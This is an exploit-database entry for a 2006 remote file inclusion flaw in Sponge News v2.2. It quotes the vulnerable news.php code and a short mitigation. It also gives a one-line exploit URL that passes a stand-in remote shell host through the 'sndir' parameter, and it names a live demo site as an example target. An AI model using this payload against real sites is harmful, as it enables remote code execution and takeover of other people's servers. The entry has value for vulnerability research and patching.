header-logo
Suggest Exploit
vendor:
Sponge News
by:
SHiKaA
N/A
CVSS
N/A
Remote File Inclusion
98
CWE
Product Name: Sponge News
Affected Version From: v2.2
Affected Version To: v2.2
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Sponge News <= v2.2 (sndir) Remote File Inclusion Exploit

A vulnerability exists in Sponge News v2.2, due to the improper validation of user-supplied input in the 'sndir' parameter of the 'news.php' script. An attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system by passing a malicious URL in the 'sndir' parameter.

Mitigation:

Ensure that user-supplied input is properly validated before being used in the application.
Source

Exploit-DB raw data:

#==============================================================================================
#Sponge News <= v2.2 (sndir) Remote File Inclusion Exploit
#===============================================================================================
#                                                                       
#Critical Level : Dangerous                                             
#                                                                       
#Venedor site : http://rickeeweb.free.fr/spongeweb/       
#                                                                       
#Version : v2.2                                             
#                                                         
#================================================================================================
#Bug in : news.php
#
#Vlu Code :
#--------------------------------
#      ########################
#       # Les variables utiles #
#       ########################
#       $newsdir = "news/";
#       $commentdir = "comments/";
#       $snversion = "2.2";
#       $lastmodif = "Decembre 2002";
#       $scriptdir = $sndir;
#       $page = $current;
#       require $scriptdir."config.php";
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/news.php?sndir=http://SHELLURL.COM?
#
#Example :
#       http://rickeeweb.free.fr/sndemo/
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : SiMooooo KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd
# Special Thx To : Str0ke
==================================================================================================

# milw0rm.com [2006-09-05]